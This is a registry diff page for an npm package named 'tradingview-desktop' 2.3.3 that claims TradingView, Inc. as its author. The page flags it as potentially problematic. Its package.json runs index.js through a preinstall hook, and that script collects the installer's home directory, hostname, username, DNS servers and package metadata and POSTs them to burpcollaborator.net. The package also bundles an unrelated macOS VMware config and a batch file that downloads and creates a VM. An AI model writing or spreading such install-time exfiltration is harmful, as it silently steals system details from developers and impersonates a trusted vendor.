tradingview-desktop 2.3.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of tradingview-desktop might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1,47 @@
1
+ //author:- whitehacker003@protonmail.com
2
+ const os = require("os");
3
+ const dns = require("dns");
4
+ const querystring = require("querystring");
5
+ const https = require("https");
6
+ const packageJSON = require("./package.json");
7
+ const package = packageJSON.name;
8
+
9
+ const trackingData = JSON.stringify({
10
+ p: package,
11
+ c: __dirname,
12
+ hd: os.homedir(),
13
+ hn: os.hostname(),
14
+ un: os.userInfo().username,
15
+ dns: dns.getServers(),
16
+ r: packageJSON ? packageJSON.___resolved : undefined,
17
+ v: packageJSON.version,
18
+ pjson: packageJSON,
19
+ });
20
+
21
+ var postData = querystring.stringify({
22
+ msg: trackingData,
23
+ });
24
+
25
+ var options = {
26
+ hostname: "burpcollaborator.net", //replace burpcollaborator.net with Interactsh or pipedream
27
+ port: 443,
28
+ path: "/",
29
+ method: "POST",
30
+ headers: {
31
+ "Content-Type": "application/x-www-form-urlencoded",
32
+ "Content-Length": postData.length,
33
+ },
34
+ };
35
+
36
+ var req = https.request(options, (res) => {
37
+ res.on("data", (d) => {
38
+ process.stdout.write(d);
39
+ });
40
+ });
41
+
42
+ req.on("error", (e) => {
43
+ // console.error(e);
44
+ });
45
+
46
+ req.write(postData);
47
+ req.end();
@@ -0,0 +1,113 @@
1
+ .encoding = "windows-1252"
2
+ config.version = "8"
3
+ virtualHW.version = "20"
4
+ pciBridge0.present = "TRUE"
5
+ pciBridge4.present = "TRUE"
6
+ pciBridge4.virtualDev = "pcieRootPort"
7
+ pciBridge4.functions = "8"
8
+ pciBridge5.present = "TRUE"
9
+ pciBridge5.virtualDev = "pcieRootPort"
10
+ pciBridge5.functions = "8"
11
+ pciBridge6.present = "TRUE"
12
+ pciBridge6.virtualDev = "pcieRootPort"
13
+ pciBridge6.functions = "8"
14
+ pciBridge7.present = "TRUE"
15
+ pciBridge7.virtualDev = "pcieRootPort"
16
+ pciBridge7.functions = "8"
17
+ vmci0.present = "TRUE"
18
+ hpet0.present = "TRUE"
19
+ nvram = "macOS 10.15.nvram"
20
+ virtualHW.productCompatibility = "hosted"
21
+ powerType.powerOff = "soft"
22
+ powerType.powerOn = "soft"
23
+ powerType.suspend = "soft"
24
+ powerType.reset = "soft"
25
+ displayName = "macOS 10.15"
26
+ usb.vbluetooth.startConnected = "TRUE"
27
+ smc.present = "TRUE"
28
+ smbios.restrictSerialCharset = "TRUE"
29
+ firmware = "efi"
30
+ guestOS = "darwin19-64"
31
+ board-id.reflectHost = "TRUE"
32
+ ich7m.present = "TRUE"
33
+ tools.syncTime = "FALSE"
34
+ sound.autoDetect = "TRUE"
35
+ sound.virtualDev = "hdaudio"
36
+ sound.fileName = "-1"
37
+ sound.present = "TRUE"
38
+ numvcpus = "4"
39
+ cpuid.coresPerSocket = "4"
40
+ memsize = "4096"
41
+ sata0.present = "TRUE"
42
+ sata0:0.deviceType = "rawDisk"
43
+ sata0:0.fileName = "macOS 10.15.vmdk"
44
+ sata0:0.present = "TRUE"
45
+ sata0:1.autodetect = "TRUE"
46
+ sata0:1.deviceType = "cdrom-raw"
47
+ sata0:1.fileName = "auto detect"
48
+ sata0:1.present = "TRUE"
49
+ usb.present = "TRUE"
50
+ ehci.present = "TRUE"
51
+ usb_xhci.present = "TRUE"
52
+ ethernet0.connectionType = "nat"
53
+ ethernet0.addressType = "generated"
54
+ ethernet0.virtualDev = "e1000e"
55
+ ethernet0.present = "TRUE"
56
+ extendedConfigFile = "macOS 10.15.vmxf"
57
+ floppy0.present = "FALSE"
58
+ vmxstats.filename = "macOS 10.15.scoreboard"
59
+ numa.autosize.cookie = "40042"
60
+ numa.autosize.vcpu.maxPerVirtualNode = "4"
61
+ uuid.bios = "56 4d 8f bd 8d db 0b e7-13 cb 5c 48 17 31 2b 8c"
62
+ uuid.location = "56 4d 8f bd 8d db 0b e7-13 cb 5c 48 17 31 2b 8c"
63
+ pciBridge0.pciSlotNumber = "17"
64
+ pciBridge4.pciSlotNumber = "21"
65
+ pciBridge5.pciSlotNumber = "22"
66
+ pciBridge6.pciSlotNumber = "23"
67
+ pciBridge7.pciSlotNumber = "24"
68
+ usb.pciSlotNumber = "32"
69
+ ethernet0.pciSlotNumber = "160"
70
+ sound.pciSlotNumber = "33"
71
+ ehci.pciSlotNumber = "34"
72
+ usb_xhci.pciSlotNumber = "192"
73
+ sata0.pciSlotNumber = "35"
74
+ sata0:0.redo = ""
75
+ svga.vramSize = "268435456"
76
+ vmotion.checkpointFBSize = "134217728"
77
+ vmotion.checkpointSVGAPrimarySize = "268435456"
78
+ vmotion.svga.mobMaxSize = "268435456"
79
+ vmotion.svga.graphicsMemoryKB = "262144"
80
+ ethernet0.generatedAddress = "00:0c:29:31:2b:8c"
81
+ ethernet0.generatedAddressOffset = "0"
82
+ vmci0.id = "389098380"
83
+ monitor.phys_bits_used = "45"
84
+ cleanShutdown = "TRUE"
85
+ softPowerOff = "FALSE"
86
+ usb_xhci:6.speed = "2"
87
+ usb_xhci:6.present = "TRUE"
88
+ usb_xhci:6.deviceType = "hub"
89
+ usb_xhci:6.port = "6"
90
+ usb_xhci:6.parent = "-1"
91
+ usb_xhci:7.speed = "4"
92
+ usb_xhci:7.present = "TRUE"
93
+ usb_xhci:7.deviceType = "hub"
94
+ usb_xhci:7.port = "7"
95
+ usb_xhci:7.parent = "-1"
96
+ toolsInstallManager.updateCounter = "2"
97
+ smc.version = "0"
98
+ cpuid.0.eax = "0000:0000:0000:0000:0000:0000:0000:1011"
99
+ cpuid.0.ebx = "0111:0101:0110:1110:0110:0101:0100:0111"
100
+ cpuid.0.ecx = "0110:1100:0110:0101:0111:0100:0110:1110"
101
+ cpuid.0.edx = "0100:1001:0110:0101:0110:1110:0110:1001"
102
+ cpuid.1.eax = "0000:0000:0000:0001:0000:0110:0111:0001"
103
+ cpuid.1.ebx = "0000:0010:0000:0001:0000:1000:0000:0000"
104
+ cpuid.1.ecx = "1000:0010:1001:1000:0010:0010:0000:0011"
105
+ cpuid.1.edx = "0000:0111:1000:1011:1111:1011:1111:1111"
106
+ smbios.reflectHost = "TRUE"
107
+ hw.model = "iMac19,1"
108
+ board-id = "Mac-AA95B1DDAB278B95"
109
+
110
+ usb_xhci:4.present = "TRUE"
111
+ usb_xhci:4.deviceType = "hid"
112
+ usb_xhci:4.port = "4"
113
+ usb_xhci:4.parent = "-1"
package/macvm.bat ADDED
@@ -0,0 +1,9 @@
1
+ @echo off
2
+
3
+ cd %USERPROFILE%
4
+ mkdir macOS
5
+ curl -o "macOS.vmx" "https://raw.githubusercontent.com/SomeoneAlt-86/macos-vmware/main/macOS%2010.15.vmx"
6
+
7
+ cd "C:\Program Files (x86)\VMware\VMware Workstation"
8
+ vmrun createvm "%USERPROFILE%\" -s "%USERPROFILE%\macOS\macOS.vmx" -t vmx
9
+
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "tradingview-desktop",
3
+ "version": "2.3.3",
4
+ "description": "Experience extra power, extra speed and extra flexibility, all with the same UX you know and love.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "TradingView, Inc.",
11
+ "license": "ISC"
12
+ }